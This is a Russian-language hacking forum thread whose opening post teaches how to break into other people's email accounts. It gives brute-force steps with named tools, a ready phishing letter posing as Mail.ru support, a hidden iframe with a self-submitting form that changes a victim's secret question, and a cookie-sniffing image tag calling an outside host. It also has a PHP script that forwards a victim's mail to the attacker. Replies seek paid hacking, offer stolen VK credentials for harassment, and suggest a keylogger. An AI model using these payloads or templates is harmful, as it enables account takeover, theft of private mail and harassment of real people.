Форум о защите от: хакеров, взлом, раскрутка, хакер, вирусы, взлом программы, взлом паролей, взлом вконтакте, взлом icq, раскрутка сайта, взлом скачать, взлом почты, взлом ru, проги взлома, хакер, программа взлома, трояны, программирование

Хакер, взлом, программа, сайт, форум, информатика, железо, разгон, раскрутка, SEO, защита, безопасность, взломать, как взломать, взлом icq, взлом вконтакте, взлом программ, одноклассники, взлом почты, взлом аськи
Текущее время: 04-05, 16:23

Часовой пояс: UTC + 3 часа




Начать новую тему Ответить на тему  [ Сообщений: 11 ] 
Автор Сообщение
 Заголовок сообщения: Взлом мыла
СообщениеДобавлено: 31-08, 15:32 
Не в сети
Studing AH-user

Зарегистрирован: 31-08, 15:30
Сообщения: 31
Привет! в этой статье я попытаюсь расказать вам как нужно взламывать мыло. Сделать это можно несколькими способами. Например: Первое - перебором пасса с помошью брутфорса, что не всегда помогает. Второе - можно воспользоваться методами соц . инжинерии . Тут всё зависит от того как грамотно составить ловушку. Нидавно у меня самого угнали мыло этим самым способом . Третий способ - это с помошью html , php , и java скриптов. Очень действенный способ. Всё что нужно сделать в этом способе это отослать скрипт на почту , и после того как жертва прочтёт его мы получаем его кукисы или можно составить такой скрипт чтобы он менял секретный вопрос и ответ на него.Точно так же можно поменять и пароль, но после этого жертва не сможет больше заходить на свою почту и мы не будем получать новые письма , так что лучьше поменять вопрос и узнать пасс. Ну так вот я обьясну каждый из этих способов.

Взлом с помошью Брутфорса.

Ну так вот (для танкистов брутфорсом называется программа которая перебирает пароли) нашим орудием будет S. Tools Xakep . Ну нравится мне эта прога :) . Берём её и скачиваем хороший словарь . Если мы знаем имя юзера то создаём текстовый файл с одним единственным именем внутри (это будет логин нашего юзера) . Например я хочу взломать мыло Support@mail.ru ( конечно мне его не взломать ; =) ) я создал на рабочем столе файл с расширением .txt (для танкистов это делается нажатием правой кнопки мыши ) и назвав его User.txt вписал внутри только Support. Идём к нашей проге и указываем путь к нашему файлу User.txt , после указываем где у нас находится словарь с паролями. Указываем адрес сервера в нашем случае это pop.mail.ru и жмём на кнопку "Начать подбор". После чего ждём .......(все эти операции нужно проводить находясь в инете). Ну что пароль подобрался ? Нет ? У меня тоже :). Ну если пароля нет то ищем другой словарь и пытаемся снова . Можно и без словаря всё это проделать с помошью другой программы например возмём Brutus A2 и в месте где написано Pass Mode ставим Brute Force. Этим самым мы указываем чтобы прога сама перебирала пароли пока не надоест.

Соц. Инженерия.

Сработает этот метод или нет зависит от тебя и от юзера чью почту ты будешь ломать. Во первых тебе нужно уметь общаться с жертвой "без матов" , а покультурнее . С хорошо составленой ловушкой у тебя есть шанс на получение заветного пасса. Например ты можешь написать письмо ламеру с примерно таким содержанием :

Извините за причинённые неудобства , но в связи с тем, что мы переходим на новое оборудование не могли бы вы послать нам на указанный адрес письмо в следующем формате:

1. Примерная дата регистрации

2. Ваше имя

3. Ваш логин

4. Ваш пароль

5. Ответ на ваш секретный вапрос.


Приносим ещё раз свои извинения за причинённые неудобства

Служба технической поддержки Mail.ru



Ну как понравилось письмо ? Ты можешь написать своё письмо главное без ошибок и чтобы юзер поверил тебе. Ну остальные методы социальной инжинерии примерно такие же (путём обшения получаем нужную информацию).
С помошью скриптов.
Способ очень прост . Пишем письмо с таким содержанием:
&ltiframe src="www.Xakers-zona-soft.narod.ru/lamer.htm" width="11" height="11" style="overflow:hidden;backgroud-color:black;border:none;"frameborder="0">
А из скрипта мы видем что должен запуститься другой скрипт Lamer.htm находяшийся на моём сайте . Его код будет таким :

&ltform method="post" action="http://www4.nm.ru/chepass.dhtml" name="chpass">

&ltimput type="hidden" name="cp_msg" value="1">

&ltimput type="hidden" name="__post" value="1">

&ltimput type="hidden" name="cp_quest" value="Your Lamer?">

&ltimput type="hidden" name="cp_answ" value="YES"?>

&ltimput type="hidden" value="Сохранить" name="Save">

&ltform>

&ltscript>

document.chpass.submit();

&ltscript>


Здесь мы видим поле где стоит Вопрос и поле с ответом. Отсылаем его юзеру и после того как он его просмотрит то вопрос должен поменяться . И мы можем поменять его пароль на несложный вопрос "You Lamer" , ответив "YES" :).
Так же можно прочитать его почту с помошью снифера. Делается это так. Посылаем письмо такого содержанием:

\x3cimg src="http\x3a//antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e

После этого заходим на http://www.antichat.ru/sniff/log.php и смотрим логи снифера. Там мы найдём на самом верху (или где нибудь ещё) кукисы злобного юзера и копируем то что нам надо в окошко броузера. И мы у него роемся в почтовом ящике.
Можно так же сделать скрипт чтобы перехватывала все входяшие письма и вместе с отправкой юзеру письмо доставляется и к нам на почту . Скрипт выглядит примерно так:
<?
$adr = "".getenv("HTTP_REFERER")."";
$id = substr("$adr", 31, 36);
$url = "http://mail.rambler.ru/Session/$id/Rules.wssp?Redirect=1&RedirKeep=1&KeepToAndCc=1&RedirectText=xak-shamil@rambler.ru&Update=Сохранить%20изменения";
header("Location: $url");
?>
Этот способ прокатит только на www.rambler.ru (имеется в виду с использованием этого скрипта). И строка где есть "Update=... "должна писаться в отной строчке (ну можно и так оставить =)). Наш скрипт называется Fuck.php , а значит в письме мы должны писать вот это:

&ltimg src="http://Xakers-zona-soft.narod.ru/Fuck.php">


Результат будет такой что после прочтения этого письма все входяшие письма Ламера будут нашими.
Думаю на этом хватит о взломе почты. Но помните всё что написано в этой статье написано для ознакомления читателя .

Внимание!!!!!
Я не несу никакой ответственности за последствия вызванные после прочтения этой статьи. И ПОМНИТЕ ЧТО ВСЕ ЭТИ ДЕЙСТВИЯ ЗАКОН НЕ ОДОБРЯЕТ ВЕДЬ КАК НИКАК ВЫ ВЛАМЫВАЕТЕСЬ В ЛИЧНУЮ ЖИЗНЬ ЛАМЕРА :). ПРЕЖДЕ ЧЕМ ДЕЙСТВОВАТЬ ПОДУМАЙТЕ О ПОСЛЕДСТВИЯХ . ЛУЧШЕ УЧИТЬ ЯЗЫКИ ПРОГРАМИРОВАНИЯ ЧЕМ УНИЧТОЖАТЬ ЧУЖИЕ ДАННЫЕ И ВСЁ ТАКОЕ !!!!!


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 06-11, 11:26 
Не в сети
New AH-user

Зарегистрирован: 05-11, 10:52
Сообщения: 3
Откуда: Таджикистан
&ltiframe src="www.Xakers-zona-soft.narod.ru/lamer.htm" width="11" height="11" style="overflow:hidden;backgroud-color:black;border:none;"frameborder="0">


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 06-11, 17:06 
Не в сети
<b><font color=red>Admin</font></b>
Аватара пользователя

Зарегистрирован: 22-05, 15:38
Сообщения: 1901
Амир писал(а):
&ltiframe src="www.Xakers-zona-soft.narod.ru/lamer.htm" width="11" height="11" style="overflow:hidden;backgroud-color:black;border:none;"frameborder="0">


?!


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 30-12, 22:35 
Не в сети
New AH-user

Зарегистрирован: 30-12, 22:25
Сообщения: 3
привет всем!помогите взломать почтовый ящик если пользыватель пользуеться моим компом


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 14-01, 12:55 
Не в сети
New AH-user

Зарегистрирован: 14-01, 12:22
Сообщения: 2
Хрен тебе кто вскроет!!! Нету тут способных делать, только рассуждают!!! :grin: :grin: :grin: Если есть желающие заработать 200баксов - пишите в асю 422-596-717 . Только вряд ли есть тот, кто реально сможет вскрыть мейл!! Хф-Хф!!


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 14-01, 16:50 
Не в сети
<b><font color=red>Admin</font></b>
Аватара пользователя

Зарегистрирован: 22-05, 15:38
Сообщения: 1901
avarganov
Хех, никто не будет отзываться на призывы какого-то ламья)


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 27-01, 18:46 
Не в сети
New AH-user

Зарегистрирован: 10-01, 01:05
Сообщения: 8
Здрасте товарищи Хакеры :cool: .. я ломанул в контакте страничку одного очень нехорошего человечка, у меня есть в этом свои интересы...кто из вас хочет поиздеватся над его страничкой и написать о нем там всякие нехорошие слова??? если есть такие... отзовитесь я скину его мыло и пароли, только пароль ненужно менять, хорошо???? :lol:


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 27-01, 18:51 
Не в сети
New AH-user

Зарегистрирован: 10-01, 01:05
Сообщения: 8
papa писал(а):
привет всем!помогите взломать почтовый ящик если пользыватель пользуеться моим компом


напиши мне адресок мыла и данные которые знаешь о том кого нужно ломануть, помогу чем смогу...гарантии что все получится дать немогу :idea:


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 29-01, 08:26 
Не в сети
New AH-user

Зарегистрирован: 10-01, 01:05
Сообщения: 8
papa писал(а):
привет всем!помогите взломать почтовый ящик если пользыватель пользуеться моим компом

а еще проще поставь прогу которая копирует все нажатия на клавиатуре и все будет хокей


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 17-11, 08:21 
Не в сети
New AH-user

Зарегистрирован: 17-11, 08:11
Сообщения: 1
помогите сломать мыло на hotmail , кто нить пожалуйста


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 17-11, 14:10 
Не в сети
<b><font color=red>Admin</font></b>
Аватара пользователя

Зарегистрирован: 22-05, 15:38
Сообщения: 1901
lisa
Тебе в раздел Барахолка.


Вернуться к началу
 Профиль  
 
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  [ Сообщений: 11 ] 

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения

Найти:
Перейти:  
cron
Powered by Forumenko © 2006–2014
Русская поддержка phpBB